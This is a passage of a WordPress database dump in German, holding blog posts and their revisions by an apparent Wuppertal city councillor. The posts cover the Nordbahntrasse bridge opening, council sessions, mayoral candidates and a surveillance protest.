umzubauen und in das Radwegenetz zu integrieren.','Nordbahntrasse: Brücke Bracken eröffnet','','publish','open','open','','nordbahntrasse-brucke-bracken-eroffnet','','','2015-06-21 00:12:43','2015-06-20 22:12:43','',0,'http://www.ollital.de/wordpress/?p=212',0,'post','',0),(213,2,'2015-05-29 18:55:41','2015-05-29 16:55:41','\"EroeffnungHeute wurde die Brücke Bracken durch Oberbürgermeister Peter Jung und Dr. Carsten Gerhard offiziell freigegeben. Nach einem kurzen Spaziergang vom ehemaligen Bahnübergang Linderhauser Str. bis zur Brücke wohnten 80 bis 100 Bürger der traditionellen \"Banddurchschneidezeremonie\" bei, nach der der Spaziergang bis zum Haltepunkt Bracken fortgesetzt wurde. Dort sorgte die Chorgemeinschaft Nächstebreck /MGV Bracken für die musikalische Abwechslung bei den Reden von Peter Jung, Carsten Gerhard und den anderen Verantwortlichen für das Nordbahntrassenprojekt.\r\nDie Brücke ist meiner Meinung nach mit seinen roten und blauen Streben ein echter Hingucker. Mit der Freigabe der Brücke ist die Nordbahntrasse jezt von Schee bis Vohwinkel durchgängig befahrbar. Für einige der Nebenstrecken laufen schon Planungen, um sie ebenfalls umzubauen und in das Radwegenetz zu integrieren.','Nordbahntrasse Brücke Bracken eröffnet','','inherit','open','open','','212-revision-v1','','','2015-05-29 18:55:41','2015-05-29 16:55:41','',212,'http://www.ollital.de/wordpress/index.php/2015/05/212-revision-v1/',0,'revision','',0),(214,2,'2015-05-29 18:55:58','2015-05-29 16:55:58','\"Eroeffnung\r\nHeute wurde die Brücke Bracken durch Oberbürgermeister Peter Jung und Dr. Carsten Gerhard offiziell freigegeben. Nach einem kurzen Spaziergang vom ehemaligen Bahnübergang Linderhauser Str. bis zur Brücke wohnten 80 bis 100 Bürger der traditionellen \"Banddurchschneidezeremonie\" bei, nach der der Spaziergang bis zum Haltepunkt Bracken fortgesetzt wurde. Dort sorgte die Chorgemeinschaft Nächstebreck /MGV Bracken für die musikalische Abwechslung bei den Reden von Peter Jung, Carsten Gerhard und den anderen Verantwortlichen für das Nordbahntrassenprojekt.\r\nDie Brücke ist meiner Meinung nach mit seinen roten und blauen Streben ein echter Hingucker. Mit der Freigabe der Brücke ist die Nordbahntrasse jezt von Schee bis Vohwinkel durchgängig befahrbar. Für einige der Nebenstrecken laufen schon Planungen, um sie ebenfalls umzubauen und in das Radwegenetz zu integrieren.','Nordbahntrasse Brücke Bracken eröffnet','','inherit','open','open','','212-revision-v1','','','2015-05-29 18:55:58','2015-05-29 16:55:58','',212,'http://www.ollital.de/wordpress/index.php/2015/05/212-revision-v1/',0,'revision','',0),(216,2,'2015-06-01 21:48:15','2015-06-01 19:48:15','Die Grünen werden zur Oberbürgermeisterwahl am 13.09.2015 einen eigenen Kandidaten aufstellen. Der Kandidat wird auf einer Kreismitgliederversammlung am 18. Juni ermittelt.\r\n\r\n\r\nMeldung bei B90/G','eigener OB-Kandidat von BÜNDNIS 90/ Die Grünen','','publish','open','open','','eigener-ob-kandidat-von-bundnis-90-die-grunen','','','2015-06-01 22:09:25','2015-06-01 20:09:25','',0,'http://www.ollital.de/wordpress/?p=216',0,'post','',0),(217,2,'2015-06-01 21:48:15','2015-06-01 19:48:15','Die Grünen werden zur Oberbürgermeisterwahl am 13.09.2015 eine eigenen Kandidaten aufstellen. Der Kandidaten wird auf einer Kreismitgliederversammlung am 18. Juni ermittelt.\r\n\r\n\r\nMeldung bei B90/G','eigener OB-Kandidat von BÜNDNIS 90/ Die Grünen','','inherit','open','open','','216-revision-v1','','','2015-06-01 21:48:15','2015-06-01 19:48:15','',216,'http://www.ollital.de/wordpress/index.php/2015/06/216-revision-v1/',0,'revision','',0),(218,2,'2015-06-01 22:08:54','2015-06-01 20:08:54','Die Grünen werden zur Oberbürgermeisterwahl am 13.09.2015 eine eigenen Kandidaten aufstellen. Der Kandidat wird auf einer Kreismitgliederversammlung am 18. Juni ermittelt.\r\n\r\n\r\nMeldung bei B90/G','eigener OB-Kandidat von BÜNDNIS 90/ Die Grünen','','inherit','open','open','','216-revision-v1','','','2015-06-01 22:08:54','2015-06-01 20:08:54','',216,'http://www.ollital.de/wordpress/index.php/2015/06/216-revision-v1/',0,'revision','',0),(219,2,'2015-06-01 22:09:25','2015-06-01 20:09:25','Die Grünen werden zur Oberbürgermeisterwahl am 13.09.2015 einen eigenen Kandidaten aufstellen. Der Kandidat wird auf einer Kreismitgliederversammlung am 18. Juni ermittelt.\r\n\r\n\r\nMeldung bei B90/G','eigener OB-Kandidat von BÜNDNIS 90/ Die Grünen','','inherit','open','open','','216-revision-v1','','','2015-06-01 22:09:25','2015-06-01 20:09:25','',216,'http://www.ollital.de/wordpress/index.php/2015/06/216-revision-v1/',0,'revision','',0),(221,2,'2015-06-10 16:02:19','2015-06-10 14:02:19','Die Gesamtschule in Barmen wurde heute als beste Schule Deutschlands prämiert. Angela Merkel überreichte in Berlin den mit 100.000 EUR dotierten Preis der Robert Bosch Stiftung an eine Delegation von Lehrern und Schülern der Schule.\"Andere Schulen können von der Gesamtschule Barmen lernen, wie Partizipation und Teilhabe in exzellenter Weise gelebt werden.\", meinte ein Sprecher der Jury.\r\n\r\nMeinen Glückwunsch an unsere preisgekrönte Schule, ich hoffe, andere Bildungseinrichtungen nehmen sich euch zum Vorbild.\r\n\r\nMeldung der Robert Bosch Stiftung','Gesamtschule Barmen ausgezeichnet','','publish','open','open','','gesamtschule-barmen-ausgezeichnet','','','2015-06-10 16:02:41','2015-06-10 14:02:41','',0,'http://www.ollital.de/wordpress/?p=221',0,'post','',0),(222,2,'2015-06-10 16:02:19','2015-06-10 14:02:19','Die Gesamtschule in Barmen wurde heute als beste Schule Deutschlands ausgezeichnet. Angela Merkel überreichte in Berlin den mit 100.000 EUR dotierten Preis der Robert Bosch Stiftung an eine Delegation von Lehrern und Schülern der Schule.\"Andere Schulen können von der Gesamtschule Barmen lernen, wie Partizipation und Teilhabe in exzellenter Weise gelebt werden.\", meinte ein Sprecher der Jury.\r\n\r\nMeinen Glückwunsch an unsere preisgekrönte Schule, ich hoffe, andere Bildungseinrichtungen nehmen sich euch zum Vorbild.\r\n\r\nMeldung der Robert Bosch Stiftung','Gesamtschule Barmen ausgezeichnet','','inherit','open','open','','221-revision-v1','','','2015-06-10 16:02:19','2015-06-10 14:02:19','',221,'http://www.ollital.de/wordpress/index.php/2015/06/221-revision-v1/',0,'revision','',0),(223,2,'2015-06-10 16:02:41','2015-06-10 14:02:41','Die Gesamtschule in Barmen wurde heute als beste Schule Deutschlands prämiert. Angela Merkel überreichte in Berlin den mit 100.000 EUR dotierten Preis der Robert Bosch Stiftung an eine Delegation von Lehrern und Schülern der Schule.\"Andere Schulen können von der Gesamtschule Barmen lernen, wie Partizipation und Teilhabe in exzellenter Weise gelebt werden.\", meinte ein Sprecher der Jury.\r\n\r\nMeinen Glückwunsch an unsere preisgekrönte Schule, ich hoffe, andere Bildungseinrichtungen nehmen sich euch zum Vorbild.\r\n\r\nMeldung der Robert Bosch Stiftung','Gesamtschule Barmen ausgezeichnet','','inherit','open','open','','221-revision-v1','','','2015-06-10 16:02:41','2015-06-10 14:02:41','',221,'http://www.ollital.de/wordpress/index.php/2015/06/221-revision-v1/',0,'revision','',0),(224,2,'2015-06-11 19:42:24','2015-06-11 17:42:24','Herr Widmann gab heute seinen letzten Bericht zur Nordbahntrasse und verabschiedet sich in den Ruhestand. Er äußerte seine Zufriedenheit, dass die Trasse jetzt durchgängig durchfahrbar ist.\r\nZwei weitere Beschlussvorlagen zu IKEA wurden angenommen.\r\n\r\nUnser Antrag zum Freifunk wird hinter die Sommerferien geschoben, da die Verwaltung es bislang nicht geschafft hat, die geforderte rechtliche Bewertung zu erstellen. Allerdings wurde ein allgemeines Wohlwollen gegenüber dem Antrag deutlich.','Stadtentwicklungsausschuss vom 11.06.2015','','publish','open','open','','stadtentwicklungsausschuss-vom-11-06-2015','','','2015-06-11 19:42:24','2015-06-11 17:42:24','',0,'http://www.ollital.de/wordpress/?p=224',0,'post','',0),(225,2,'2015-06-11 19:42:24','2015-06-11 17:42:24','Herr Widmann gab heute seinen letzten Bericht zur Nordbahntrasse und verabschiedet sich in den Ruhestand. Er äußerte seine Zufriedenheit, dass die Trasse jetzt durchgängig durchfahrbar ist.\r\nZwei weitere Beschlussvorlagen zu IKEA wurden angenommen.\r\n\r\nUnser Antrag zum Freifunk wird hinter die Sommerferien geschoben, da die Verwaltung es bislang nicht geschafft hat, die geforderte rechtliche Bewertung zu erstellen. Allerdings wurde ein allgemeines Wohlwollen gegenüber dem Antrag deutlich.','Stadtentwicklungsausschuss vom 11.06.2015','','inherit','open','open','','224-revision-v1','','','2015-06-11 19:42:24','2015-06-11 17:42:24','',224,'http://www.ollital.de/wordpress/index.php/2015/06/224-revision-v1/',0,'revision','',0),(228,2,'2015-06-13 22:29:03','2015-06-13 20:29:03','','fsa15','','inherit','open','open','','fsa15','','','2015-06-13 22:29:03','2015-06-13 20:29:03','',229,'http://www.ollital.de/wordpress/wp-content/uploads/2015/06/fsa15.jpg',0,'attachment','image/jpeg',0),(229,2,'2015-06-13 22:41:30','2015-06-13 20:41:30','\"fsa15\"\r\nHeute fand in Düsseldorf ein Teil der \"Freiheit statt Angst\" Tour 2015 statt. Die dezentrale Demo gegen Vorratsdatenspeicherung und Überwachung zog etwa 50 Leute in die verregnete Landeshauptstadt. Über die Route\r\n
                                                                  \r\n
                                                                • Friedrich-Ebert-Straße
                                                                • \r\n
                                                                • Steinstraße
                                                                • \r\n
                                                                • Königsallee
                                                                • \r\n
                                                                • Trinkhausstraße
                                                                • \r\n
                                                                • Heinrich-Heine-Allee
                                                                • \r\n
                                                                • Grabbeplatz
                                                                • \r\n
                                                                • Mühlenstraße
                                                                • \r\n
                                                                • Burgplatz
                                                                • \r\n
                                                                • Rathausufer
                                                                • \r\n
                                                                • Schulstraße
                                                                • \r\n
                                                                • Benrather Straße
                                                                • \r\n
                                                                \r\n\r\nkamen wir dann zur Schlusskundgebung auf dem Graf-Adolf-Platz an. Dort war dann auch die Sonne wieder rausgekommen.\r\nIch durfte bei den vorderen Polizeimotorrädern vorweg gehen und gabdadurch das Tempo vor.\r\nSchade, das wir nicht mehr Leute motivieren konnten, aber unsere Landtagsabgeordneten Joachim Paul und Frank Herrmann waren mit von der Partie.\r\nDanke an Patrick Schiffer für die Organisation.\r\nUnd mein Dank an die Düsseldorfer Polizei, die sich meinem Gehtempo angepasst haben, so dass ich die ganze Strecke zu Fuss geschafft habe.\r\n','Freiheit statt Angst','','publish','open','open','','freiheit-statt-angst','','','2015-07-03 08:35:45','2015-07-03 06:35:45','',0,'http://www.ollital.de/wordpress/?p=229',0,'post','',0),(230,2,'2015-06-13 22:40:13','2015-06-13 20:40:13','\"fsa15\" Heute fand in Düsseldorf ein Teil der \"Freiheit statt Angst\" Tour 2015 statt. Die dezentrale Demo gegen Vorratsdatenspeicherung und Überwachung zog etwa 50 Leute in die verregnete Landeshauptstadt. Über die Route\r\n
                                                                  \r\n
                                                                • Friedrich-Ebert-Straße
                                                                • \r\n
                                                                • Steinstraße
                                                                • \r\n
                                                                • Königsallee
                                                                • \r\n
                                                                • Trinkhausstraße
                                                                • \r\n
                                                                • Heinrich-Heine-Allee
                                                                • \r\n
                                                                • Grabbeplatz
                                                                • \r\n
                                                                • Mühlenstraße
                                                                • \r\n
                                                                • Burgplatz
                                                                • \r\n
                                                                • Rathausufer
                                                                • \r\n
                                                                • Schulstraße
                                                                • \r\n
                                                                • Benrather Straße
                                                                • \r\n
                                                                \r\n\r\nkamen wir dann zur Schlusskundgebung auf dem Graf-Adolf-Platz an. Dort war dann auch die Sonne wieder rausgekommen.\r\nIch durfte bei den vorderen Polizeimotorrädern vorweg gehen und kontrollierte dadurch das Tempo.\r\nSchade, das wir nicht mehr Leute motivieren konnten, aber unsere Landtagsabgeordneten Joachim Paul und Frank Herrmann waren mit von der Partie.\r\nDanke an Patrick Schiffer für die Organisation.\r\nUnd mein Dank an die Düsseldorfer Polizei, die sich meinem Gehtempo angepasst haben, so dass ich die ganze Strecke zu Fuss geschafft habe.\r\n','Freiheit statt Angst','','inherit','open','open','','229-revision-v1','','','2015-06-13 22:40:13','2015-06-13 20:40:13','',229,'http://www.ollital.de/wordpress/index.php/2015/06/229-revision-v1/',0,'revision','',0),(231,2,'2015-06-13 22:40:53','2015-06-13 20:40:53','\"fsa15\" Heute fand in Düsseldorf ein Teil der \"Freiheit statt Angst\" Tour 2015 statt.\r\n\r\nDie dezentrale Demo gegen Vorratsdatenspeicherung und Überwachung zog etwa 50 Leute in die verregnete Landeshauptstadt. Über die Route\r\n
                                                                  \r\n
                                                                • Friedrich-Ebert-Straße
                                                                • \r\n
                                                                • Steinstraße
                                                                • \r\n
                                                                • Königsallee
                                                                • \r\n
                                                                • Trinkhausstraße
                                                                • \r\n
                                                                • Heinrich-Heine-Allee
                                                                • \r\n
                                                                • Grabbeplatz
                                                                • \r\n
                                                                • Mühlenstraße
                                                                • \r\n
                                                                • Burgplatz
                                                                • \r\n
                                                                • Rathausufer
                                                                • \r\n
                                                                • Schulstraße
                                                                • \r\n
                                                                • Benrather Straße
                                                                • \r\n
                                                                \r\n\r\nkamen wir dann zur Schlusskundgebung auf dem Graf-Adolf-Platz an. Dort war dann auch die Sonne wieder rausgekommen.\r\nIch durfte bei den vorderen Polizeimotorrädern vorweg gehen und kontrollierte dadurch das Tempo.\r\nSchade, das wir nicht mehr Leute motivieren konnten, aber unsere Landtagsabgeordneten Joachim Paul und Frank Herrmann waren mit von der Partie.\r\nDanke an Patrick Schiffer für die Organisation.\r\nUnd mein Dank an die Düsseldorfer Polizei, die sich meinem Gehtempo angepasst haben, so dass ich die ganze Strecke zu Fuss geschafft habe.\r\n','Freiheit statt Angst','','inherit','open','open','','229-revision-v1','','','2015-06-13 22:40:53','2015-06-13 20:40:53','',229,'http://www.ollital.de/wordpress/index.php/2015/06/229-revision-v1/',0,'revision','',0),(232,2,'2015-06-13 22:41:14','2015-06-13 20:41:14','\"fsa15\"\r\nHeute fand in Düsseldorf ein Teil der \"Freiheit statt Angst\" Tour 2015 statt. Die dezentrale Demo gegen Vorratsdatenspeicherung und Überwachung zog etwa 50 Leute in die verregnete Landeshauptstadt. Über die Route\r\n
                                                                  \r\n
                                                                • Friedrich-Ebert-Straße
                                                                • \r\n
                                                                • Steinstraße
                                                                • \r\n
                                                                • Königsallee
                                                                • \r\n
                                                                • Trinkhausstraße
                                                                • \r\n
                                                                • Heinrich-Heine-Allee
                                                                • \r\n
                                                                • Grabbeplatz
                                                                • \r\n
                                                                • Mühlenstraße
                                                                • \r\n
                                                                • Burgplatz
                                                                • \r\n
                                                                • Rathausufer
                                                                • \r\n
                                                                • Schulstraße
                                                                • \r\n
                                                                • Benrather Straße
                                                                • \r\n
                                                                \r\n\r\nkamen wir dann zur Schlusskundgebung auf dem Graf-Adolf-Platz an. Dort war dann auch die Sonne wieder rausgekommen.\r\nIch durfte bei den vorderen Polizeimotorrädern vorweg gehen und kontrollierte dadurch das Tempo.\r\nSchade, das wir nicht mehr Leute motivieren konnten, aber unsere Landtagsabgeordneten Joachim Paul und Frank Herrmann waren mit von der Partie.\r\nDanke an Patrick Schiffer für die Organisation.\r\nUnd mein Dank an die Düsseldorfer Polizei, die sich meinem Gehtempo angepasst haben, so dass ich die ganze Strecke zu Fuss geschafft habe.\r\n','Freiheit statt Angst','','inherit','open','open','','229-revision-v1','','','2015-06-13 22:41:14','2015-06-13 20:41:14','',229,'http://www.ollital.de/wordpress/index.php/2015/06/229-revision-v1/',0,'revision','',0),(233,2,'2015-06-16 14:44:36','2015-06-16 12:44:36','Heute vor einem Jahr fand die konstuierende Sitzung des neuen Stadtrats nach der Kommunalwahl vom 25.05.2014 statt.Zeit für mich, mal ein Zwischenfazit zu ziehen.\r\nDirekt nach der Wahl habe ich Kontakt zu verschiedenen Fraktionen gesucht, da ich nicht alleine die nächsten 6 Jahre arbeiten wollte (das hätte auch keinen praktischen Nutzen gehabt).Beim Vergleich der verschiedenen Wahlprogramme war die Schnittmenge zu BÜNDNIS 90/ Die Grünen am Größten, so dass ich mich schon sehr rasch in diese Richtung orientierte. Leider war unser Versuch, gemeinsam mit FDP und SPD eine Koalition zu schmieden (Piratenampel), nicht erfolgreich, da sich die SPD leider entschieden hat, die GroKo mit der CDU fortzusetzen. Wir kamen dann überein, dass ich für ein halbes Jahr in der Fraktion hospitiere, damit wir uns gegenseitig kennenlernen. Als Fraktionsloser durfte ich mir einen Ausschuss aussuchen, in den ich mit beratender Stimme hineingehe. Ich habe mich für \"Stadtentwicklung, Wirtschaft und Bauen\" entschieden, da ich denke, dass dort die spannensten Themen in den nächsten Jahren behandelt werden.\r\nSchon im September habe ich dann zum Thema TTIP meine erste Rede im Rat gehalten.\r\nIm Dezember habe ich die Verkaufspläne des Carnaper Platzes sehr kritisch beobachtet und die Bürgerinitiative auf dem Rott von Anfang an unterstützt.\r\nDieser Verkauf wurde überraschend abgeblasen undder entsprechende Ratsbeschluss auf unseren Antrag wieder zurückgenommen.\r\nIm Januar wurde ich dann verabredungsgemäß zum stimmberechtigten Fraktionsmitglied.\r\nSeit März versuchen wir das Thema Freifunk in Wuppertal voranzubringen. Dieser Antrag wird vorr. nach den Sommerferien im Ausschuss behandelt.\r\nIm April wurde ich als Nachrücker für einen erkrankten Fraktionskollegen stimmberechtigtes Mitglied im Betriebsausschuss Gebäudemanagement.\r\n\r\nDas ist in etwa mein Jahr im Rat. Meiner Meinung nach bin ich auf dem richtigen Weg. ','Das erste Jahr im Rat','','publish','open','open','','das-erste-jahr-im-rat','','','2015-06-16 14:44:36','2015-06-16 12:44:36','',0,'http://www.ollital.de/wordpress/?p=233',0,'post','',0),(234,2,'2015-06-16 14:44:36','2015-06-16 12:44:36','Heute vor einem Jahr fand die konstuierende Sitzung des neuen Stadtrats nach der Kommunalwahl vom 25.05.2014 statt.Zeit für mich, mal ein Zwischenfazit zu ziehen.\r\nDirekt nach der Wahl habe ich Kontakt zu verschiedenen Fraktionen gesucht, da ich nicht alleine die nächsten 6 Jahre arbeiten wollte (das hätte auch keinen praktischen Nutzen gehabt).Beim Vergleich der verschiedenen Wahlprogramme war die Schnittmenge zu BÜNDNIS 90/ Die Grünen am Größten, so dass ich mich schon sehr rasch in diese Richtung orientierte. Leider war unser Versuch, gemeinsam mit FDP und SPD eine Koalition zu schmieden (Piratenampel), nicht erfolgreich, da sich die SPD leider entschieden hat, die GroKo mit der CDU fortzusetzen. Wir kamen dann überein, dass ich für ein halbes Jahr in der Fraktion hospitiere, damit wir uns gegenseitig kennenlernen. Als Fraktionsloser durfte ich mir einen Ausschuss aussuchen, in den ich mit beratender Stimme hineingehe. Ich habe mich für \"Stadtentwicklung, Wirtschaft und Bauen\" entschieden, da ich denke, dass dort die spannensten Themen in den nächsten Jahren behandelt werden.\r\nSchon im September habe ich dann zum Thema TTIP meine erste Rede im Rat gehalten.\r\nIm Dezember habe ich die Verkaufspläne des Carnaper Platzes sehr kritisch beobachtet und die Bürgerinitiative auf dem Rott von Anfang an unterstützt.\r\nDieser Verkauf wurde überraschend abgeblasen undder entsprechende Ratsbeschluss auf unseren Antrag wieder zurückgenommen.\r\nIm Januar wurde ich dann verabredungsgemäß zum stimmberechtigten Fraktionsmitglied.\r\nSeit März versuchen wir das Thema Freifunk in Wuppertal voranzubringen. Dieser Antrag wird vorr. nach den Sommerferien im Ausschuss behandelt.\r\nIm April wurde ich als Nachrücker für einen erkrankten Fraktionskollegen stimmberechtigtes Mitglied im Betriebsausschuss Gebäudemanagement.\r\n\r\nDas ist in etwa mein Jahr im Rat. Meiner Meinung nach bin ich auf dem richtigen Weg. ','Das erste Jahr im Rat','','inherit','open','open','','233-revision-v1','','','2015-06-16 14:44:36','2015-06-16 12:44:36','',233,'http://www.ollital.de/wordpress/index.php/2015/06/233-revision-v1/',0,'revision','',0),(236,2,'2015-06-16 19:26:02','2015-06-16 17:26:02','','SeilbahnInfo1606','','inherit','open','open','','seilbahninfo1606','','','2015-06-16 19:26:02','2015-06-16 17:26:02','',237,'http://www.ollital.de/wordpress/wp-content/uploads/2015/06/SeilbahnInfo1606.jpg',0,'attachment','image/jpeg',0),(237,2,'2015-06-16 19:34:04','2015-06-16 17:34:04','\"SeilbahnInfo1606\"\r\nIm Schulzentrum Süd fand heute die dritte Infoveranstaltung zur geplanten Seilbahn statt. Auf Infowänden waren thematisch organisiert viele Antworten abgebildet, die die Fragen beantworten sollen, die auf der ersten Veranstaltung geäussert wurden. Bei jedem Themenkomplex stand ein Mitarbeiter der WSW zum persönlichen Gespräch zur Verfügung, die bei dem großen Andrang (siehe Foto) auch stark frequentiert waren.\r\nIch habe gelernt, dass im Notfall jede Gondel bis zur nächsten Station gezogen werden kann, wo dann der Rettungsdienst wartet. Die Kosten, die nicht durch die Förderung des VRR gedeckt sind (max 90%), sollen durch Einsparungen im Buslinienverkehr (Personal und Betriebskosten) aufgefangen werden.\r\nAuch ein Stand von Pro Bahn war vertreten, da diese das Projekt begleiten.\r\n','Infoveranstaltung Seilbahn am 16.06.','','publish','open','open','','infoveranstaltung-seilbahn-am-16-06','','','2015-06-16 19:34:04','2015-06-16 17:34:04','',0,'http://www.ollital.de/wordpress/?p=237',0,'post','',0),(238,2,'2015-06-16 19:34:04','2015-06-16 17:34:04','\"SeilbahnInfo1606\"\r\nIm Schulzentrum Süd fand heute die dritte Infoveranstaltung zur geplanten Seilbahn statt. Auf Infowänden waren thematisch organisiert viele Antworten abgebildet, die die Fragen beantworten sollen, die auf der ersten Veranstaltung geäussert wurden. Bei jedem Themenkomplex stand ein Mitarbeiter der WSW zum persönlichen Gespräch zur Verfügung, die bei dem großen Andrang (siehe Foto) auch stark frequentiert waren.\r\nIch habe gelernt, dass im Notfall jede Gondel bis zur nächsten Station gezogen werden kann, wo dann der Rettungsdienst wartet. Die Kosten, die nicht durch die Förderung des VRR gedeckt sind (max 90%), sollen durch Einsparungen im Buslinienverkehr (Personal und Betriebskosten) aufgefangen werden.\r\nAuch ein Stand von Pro Bahn war vertreten, da diese das Projekt begleiten.\r\n','Infoveranstaltung Seilbahn am 16.06.','','inherit','open','open','','237-revision-v1','','','2015-06-16 19:34:04','2015-06-16 17:34:04','',237,'http://www.ollital.de/wordpress/index.php/2015/06/237-revision-v1/',0,'revision','',0),(240,2,'2015-06-18 21:19:22','2015-06-18 19:19:22','Bündnis 90/ Die Grünen haben heute Abend den Fraktionsvorsitzenden Marc Schulz zu ihrem Kandidaten für die Oberbürgermeisterwahl mit 37/1/1 (Ja/Enthaltung/Nein)gekürt.\r\nMeinen Glückwunsch dazu und viel Erfolg.','Marc Schulz zum OB Kandidaten der Grünen gewählt','','publish','open','open','','marc-schulz-zum-ob-kandidaten-der-grunen-gewahlt','','','2015-06-18 22:41:42','2015-06-18 20:41:42','',0,'http://www.ollital.de/wordpress/?p=240',0,'post','',0),(241,2,'2015-06-18 21:19:22','2015-06-18 19:19:22','Bündnis 90/ Die Grünen haben heute Abend den Fraktionsvorsitzenden Marc Schulz zu ihrem Kandidaten für die Oberbürgermeisterwahl gekürt.\r\nMeinen Glückwunsch dazu und viel Erfolg.','Marc Schulz zum OB Kandidaten der Grünen gewählt','','inherit','open','open','','240-revision-v1','','','2015-06-18 21:19:22','2015-06-18 19:19:22','',240,'http://www.ollital.de/wordpress/index.php/2015/06/240-revision-v1/',0,'revision','',0),(242,2,'2015-06-18 22:41:27','2015-06-18 20:41:27','Bündnis 90/ Die Grünen haben heute Abend den Fraktionsvorsitzenden Marc Schulz zu ihrem Kandidaten für die Oberbürgermeisterwahl mit 37/1/0 (Ja/Enthaltung/Nein)gekürt.\r\nMeinen Glückwunsch dazu und viel Erfolg.','Marc Schulz zum OB Kandidaten der Grünen gewählt','','inherit','open','open','','240-revision-v1','','','2015-06-18 22:41:27','2015-06-18 20:41:27','',240,'http://www.ollital.de/wordpress/index.php/2015/06/240-revision-v1/',0,'revision','',0),(243,2,'2015-06-18 22:41:42','2015-06-18 20:41:42','Bündnis 90/ Die Grünen haben heute Abend den Fraktionsvorsitzenden Marc Schulz zu ihrem Kandidaten für die Oberbürgermeisterwahl mit 37/1/1 (Ja/Enthaltung/Nein)gekürt.\r\nMeinen Glückwunsch dazu und viel Erfolg.','Marc Schulz zum OB Kandidaten der Grünen gewählt','','inherit','open','open','','240-revision-v1','','','2015-06-18 22:41:42','2015-06-18 20:41:42','',240,'http://www.ollital.de/wordpress/index.php/2015/06/240-revision-v1/',0,'revision','',0),(244,2,'2015-06-21 00:12:43','2015-06-20 22:12:43','\"Eroeffnung\r\nHeute wurde die Brücke Bracken durch Oberbürgermeister Peter Jung und Dr. Carsten Gerhard offiziell freigegeben. Nach einem kurzen Spaziergang vom ehemaligen Bahnübergang Linderhauser Str. bis zur Brücke wohnten 80 bis 100 Bürger der traditionellen \"Banddurchschneidezeremonie\" bei, nach der der Spaziergang bis zum Haltepunkt Bracken fortgesetzt wurde. Dort sorgte die Chorgemeinschaft Nächstebreck /MGV Bracken für die musikalische Abwechslung bei den Reden von Peter Jung, Carsten Gerhard und den anderen Verantwortlichen für das Nordbahntrassenprojekt.\r\nDie Brücke ist meiner Meinung nach mit seinen roten und blauen Streben ein echter Hingucker. Mit der Freigabe der Brücke ist die Nordbahntrasse jezt von Schee bis Vohwinkel durchgängig befahrbar. Für einige der Nebenstrecken laufen schon Planungen, um sie ebenfalls umzubauen und in das Radwegenetz zu integrieren.','Nordbahntrasse: Brücke Bracken eröffnet','','inherit','open','open','','212-revision-v1','','','2015-06-21 00:12:43','2015-06-20 22:12:43','',212,'http://www.ollital.de/wordpress/index.php/2015/06/212-revision-v1/',0,'revision','',0),(245,2,'2015-06-22 21:18:11','2015-06-22 19:18:11','Die Erstattung der Elternbeiträge und Verpflegungskosten während des Kita Streiks wurde beschlossen. Nach Aussage von Dr. Slawigs werden die Betroffenen noch im Juli angeschrieben, so dass die Auszahlung dann zeitnah erfolgen kann.\r\nDie Hotel AG wird mit der GWG verschmolzen.\r\nDr. Slawig wird dem Rat im Haushaltsplan keine Senkung des Gewerbesteuerhebesatzes vorschlagen.\r\nDie Sitzung war von vielen Zwischenrufen und Nebendiskussionen geprägt. Noch nie hat der OB seine Glocke so oft gebraucht, wie heute. Scheinbar sind einige Ratskollegen urlaubsreif.\r\n\r\nDem Baubeginn für IKEA steht mit dem Beschluss der Änderung des Flächennutzungsplans und des Bebauuungsplans nichts mehr im Weg.\r\n\r\nIn der Sommerpause wird der Ratsaal renoviert. Der Lastenaufzug wurde bereits am letzten Samstag auf der linken Seite der Eingangtreppe aufgebaut. Auch die Klimaanlage soll saniert werden. In der heutigen Sitzung hab ich bemerkt, dass das keine schlechte Idee ist.\r\n\r\n','Ratssitzung vom 22.06.2015','','publish','open','open','','ratssitzung-vom-22-06-2015','','','2015-06-22 21:53:04','2015-06-22 19:53:04','',0,'http://www.ollital.de/wordpress/?p=245',0,'post','',0),(246,2,'2015-06-22 17:07:21','2015-06-22 15:07:21','Dr. Slawig wird dem Rat im Haushaltsplan keine Senkung des Gewerbesteuerhebesatzes vorlegen.\r\n','Ratssitzung vom 22.06.2015','','inherit','open','open','','245-revision-v1','','','2015-06-22 17:07:21','2015-06-22 15:07:21','',245,'http://www.ollital.de/wordpress/index.php/2015/06/245-revision-v1/',0,'revision','',0),(247,2,'2015-06-22 18:07:42','2015-06-22 16:07:42','Dr. Slawig wird dem Rat im Haushaltsplan keine Senkung des Gewerbesteuerhebesatzes vorlegen.\r\nDie Erstattung der Elternbeiträge und Verpflegungskosten während des Kita Streiks wurde beschlossen. Nach Aussage von Dr. Slawigs werden die Betroffenen noch im Juli angeschrieben, so dass die Auszahlung dann zeitnah erfolgen kann.\r\n','Ratssitzung vom 22.06.2015','','inherit','open','open','','245-revision-v1','','','2015-06-22 18:07:42','2015-06-22 16:07:42','',245,'http://www.ollital.de/wordpress/index.php/2015/06/245-revision-v1/',0,'revision','',0),(248,2,'2015-06-22 18:09:36','2015-06-22 16:09:36','Dr. Slawig wird dem Rat im Haushaltsplan keine Senkung des Gewerbesteuerhebesatzes vorlegen.\r\nDie Erstattung der Elternbeiträge und Verpflegungskosten während des Kita Streiks wurde beschlossen. Nach Aussage von Dr. Slawigs werden die Betroffenen noch im Juli angeschrieben, so dass die Auszahlung dann zeitnah erfolgen kann.\r\nDie Hotel AG wird mit der GWG verschmolzen.\r\n','Ratssitzung vom 22.06.2015','','inherit','open','open','','245-revision-v1','','','2015-06-22 18:09:36','2015-06-22 16:09:36','',245,'http://www.ollital.de/wordpress/index.php/2015/06/245-revision-v1/',0,'revision','',0),(249,2,'2015-06-22 18:26:18','2015-06-22 16:26:18','Dr. Slawig wird dem Rat im Haushaltsplan keine Senkung des Gewerbesteuerhebesatzes vorlegen.\r\nDie Erstattung der Elternbeiträge und Verpflegungskosten während des Kita Streiks wurde beschlossen. Nach Aussage von Dr. Slawigs werden die Betroffenen noch im Juli angeschrieben, so dass die Auszahlung dann zeitnah erfolgen kann.\r\nDie Hotel AG wird mit der GWG verschmolzen.\r\nDie Sitzung war von vielen Zwischenrufen und Nebendiskussionen geprägt. Noch nie hat der OB seine Glocke so oft gebraucht, wie heute. Scheinbar sind einige Ratskollegen urlaubsreif.','Ratssitzung vom 22.06.2015','','inherit','open','open','','245-revision-v1','','','2015-06-22 18:26:18','2015-06-22 16:26:18','',245,'http://www.ollital.de/wordpress/index.php/2015/06/245-revision-v1/',0,'revision','',0),(250,2,'2015-06-22 18:36:05','2015-06-22 16:36:05','Dr. Slawig wird dem Rat im Haushaltsplan keine Senkung des Gewerbesteuerhebesatzes vorlegen.\r\nDie Erstattung der Elternbeiträge und Verpflegungskosten während des Kita Streiks wurde 